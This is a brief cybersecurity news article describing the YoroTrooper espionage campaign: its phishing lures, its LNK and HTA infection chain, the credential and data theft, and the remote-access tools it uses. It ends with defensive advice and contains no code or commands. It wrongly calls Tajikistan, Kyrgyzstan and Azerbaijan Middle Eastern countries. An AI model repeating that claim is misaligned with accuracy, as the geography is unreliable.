The Commonwealth of Independent States (CIS) is battling a new threat campaign called YoroTrooper that has been targeting them recently. Based on reports, this cybercriminal operation has been executing an espionage attack against healthcare agencies and embassies since June last year.
A cybersecurity researcher explained that YoroTrooper commonly targets government agencies and energy providers in Middle Eastern countries, such as Tajikistan, Kyrgyzstan, and Azerbaijan.
Moreover, the campaign uses themed lures that target the energy company in Uzbekistan and government agencies in Tajikistan. It successfully compromised and stole credentials from a European healthcare organisation and the World Intellectual Property Organisation (WIPO).
The scope of this new threat has reached embassies within European countries. The confirmed embassies that suffered an attack from this operation are Turkmenistan and Azerbaijan, which resulted in the exfiltration of documents and deployment of additional malware payloads.
The YoroTrooper group starts its campaign through phishing emails.
The YoroTrooper campaign begins with phishing emails that contain compromised lnk files. These emails also include legitimate PDF documents related to national development to increase their authenticity and deceive more targets.
Once a target accesses the attached shortcut, the attack will leverage an [.]exe archive to recover HTA files from a remote server and drops the primary payload.
Subsequently, YoroTrooper exfiltrates troves of data, such as multiple applications, browsing history, screenshots, cookies, and system information during its espionage drive. Furthermore, YoroTrooper utilises several tools like custom malware, stealers, and RATs.
It could then use an open-source project, custom scripts, and commercially available tools to steal credentials.
YoroTrooper could also run a remote access execution through AveMaria, Warzone RAT, LodaRAT, and a Python-based malware that leverages Telegram for command and control. Lastly, researchers spotted the YoroTrooper operators utilising reverse shell binaries and a C-based keylogger.
This new cybercriminal campaign has access to considerable skills and resources to employ in their attacks. Organisations should keep their apps and AV solutions up to date and adopt anti-phishing products at the endpoints to thwart such threats.
